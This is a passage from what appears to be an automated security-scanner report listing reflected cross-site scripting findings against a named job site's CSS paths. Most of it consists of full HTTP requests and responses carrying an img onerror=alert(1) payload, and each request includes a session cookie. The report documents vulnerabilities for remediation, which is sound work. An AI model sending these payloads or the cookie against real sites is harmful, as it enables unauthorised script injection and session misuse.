Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css6646f"><img src=a onerror=alert(1)>d04b41f719b-content.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.104. http://jobs.ctg.eu/sites/all/themes/threesixty/css/content.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/content.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbdf4"><img%20src%3da%20onerror%3dalert(1)>a2669574242 was submitted in the REST URL parameter 6. This input was echoed as bbdf4"><img src=a onerror=alert(1)>a2669574242 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css/content.cssbbdf4"><img%20src%3da%20onerror%3dalert(1)>a2669574242?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:43:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:43:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css-content.cssbbdf4"><img src=a onerror=alert(1)>a2669574242 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.105. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/forms.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f83c"><img%20src%3da%20onerror%3dalert(1)>e267de7cab0 was submitted in the REST URL parameter 1. This input was echoed as 9f83c"><img src=a onerror=alert(1)>e267de7cab0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites9f83c"><img%20src%3da%20onerror%3dalert(1)>e267de7cab0/all/themes/threesixty/css/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites9f83c"><img src=a onerror=alert(1)>e267de7cab0-all-themes-threesixty-css-forms.css not-front not-logged-in page-sites9f83cimg-srca-onerroralert1e267de7cab0 no-sidebars">
...[SNIP]...

3.106. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/forms.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6659a"><img%20src%3da%20onerror%3dalert(1)>dbe43d36086 was submitted in the REST URL parameter 2. This input was echoed as 6659a"><img src=a onerror=alert(1)>dbe43d36086 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all6659a"><img%20src%3da%20onerror%3dalert(1)>dbe43d36086/themes/threesixty/css/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:35:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:35:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all6659a"><img src=a onerror=alert(1)>dbe43d36086-themes-threesixty-css-forms.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.107. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/forms.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e923"><img%20src%3da%20onerror%3dalert(1)>8929cc0ff82 was submitted in the REST URL parameter 3. This input was echoed as 4e923"><img src=a onerror=alert(1)>8929cc0ff82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes4e923"><img%20src%3da%20onerror%3dalert(1)>8929cc0ff82/threesixty/css/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes4e923"><img src=a onerror=alert(1)>8929cc0ff82-threesixty-css-forms.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.108. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/forms.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ee0"><img%20src%3da%20onerror%3dalert(1)>a0e58f3bd20 was submitted in the REST URL parameter 4. This input was echoed as 66ee0"><img src=a onerror=alert(1)>a0e58f3bd20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty66ee0"><img%20src%3da%20onerror%3dalert(1)>a0e58f3bd20/css/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty66ee0"><img src=a onerror=alert(1)>a0e58f3bd20-css-forms.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.109. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/forms.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d1d8"><img%20src%3da%20onerror%3dalert(1)>7d59f35fcff was submitted in the REST URL parameter 5. This input was echoed as 3d1d8"><img src=a onerror=alert(1)>7d59f35fcff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css3d1d8"><img%20src%3da%20onerror%3dalert(1)>7d59f35fcff/forms.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css3d1d8"><img src=a onerror=alert(1)>7d59f35fcff-forms.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.110. http://jobs.ctg.eu/sites/all/themes/threesixty/css/forms.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/forms.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de084"><img%20src%3da%20onerror%3dalert(1)>bada0a754ce was submitted in the REST URL parameter 6. This input was echoed as de084"><img src=a onerror=alert(1)>bada0a754ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css/forms.cssde084"><img%20src%3da%20onerror%3dalert(1)>bada0a754ce?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:42:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css-forms.cssde084"><img src=a onerror=alert(1)>bada0a754ce not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.111. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/reset.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 472d7"><img%20src%3da%20onerror%3dalert(1)>d21d98c0b71 was submitted in the REST URL parameter 1. This input was echoed as 472d7"><img src=a onerror=alert(1)>d21d98c0b71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites472d7"><img%20src%3da%20onerror%3dalert(1)>d21d98c0b71/all/themes/threesixty/css/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:19 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites472d7"><img src=a onerror=alert(1)>d21d98c0b71-all-themes-threesixty-css-reset.css not-front not-logged-in page-sites472d7img-srca-onerroralert1d21d98c0b71 no-sidebars">
...[SNIP]...

3.112. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/reset.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1609"><img%20src%3da%20onerror%3dalert(1)>bb347cd22fb was submitted in the REST URL parameter 2. This input was echoed as e1609"><img src=a onerror=alert(1)>bb347cd22fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/alle1609"><img%20src%3da%20onerror%3dalert(1)>bb347cd22fb/themes/threesixty/css/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:35:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:35:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-alle1609"><img src=a onerror=alert(1)>bb347cd22fb-themes-threesixty-css-reset.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.113. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/reset.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40e93"><img%20src%3da%20onerror%3dalert(1)>6c4bd4ba80 was submitted in the REST URL parameter 3. This input was echoed as 40e93"><img src=a onerror=alert(1)>6c4bd4ba80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes40e93"><img%20src%3da%20onerror%3dalert(1)>6c4bd4ba80/threesixty/css/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes40e93"><img src=a onerror=alert(1)>6c4bd4ba80-threesixty-css-reset.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.114. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/reset.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d35f"><img%20src%3da%20onerror%3dalert(1)>7f3d9831ebc was submitted in the REST URL parameter 4. This input was echoed as 4d35f"><img src=a onerror=alert(1)>7f3d9831ebc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty4d35f"><img%20src%3da%20onerror%3dalert(1)>7f3d9831ebc/css/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:41 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty4d35f"><img src=a onerror=alert(1)>7f3d9831ebc-css-reset.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.115. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/reset.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d36f"><img%20src%3da%20onerror%3dalert(1)>c1408102547 was submitted in the REST URL parameter 5. This input was echoed as 4d36f"><img src=a onerror=alert(1)>c1408102547 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css4d36f"><img%20src%3da%20onerror%3dalert(1)>c1408102547/reset.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-themes-threesixty-css4d36f"><img src=a onerror=alert(1)>c1408102547-reset.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.116. http://jobs.ctg.eu/sites/all/themes/threesixty/css/reset.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/themes/threesixty/css/reset.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8cff"><img%20src%3da%20onerror%3dalert(1)>6a1e3159388 was submitted in the REST URL parameter 6. This input was echoed as d8cff"><img src=a onerror=alert(1)>6a1e3159388 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/themes/threesixty/css/reset.cssd8cff"><img%20src%3da%20onerror%3dalert(1)>6a1e3159388?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:42:34 GMT
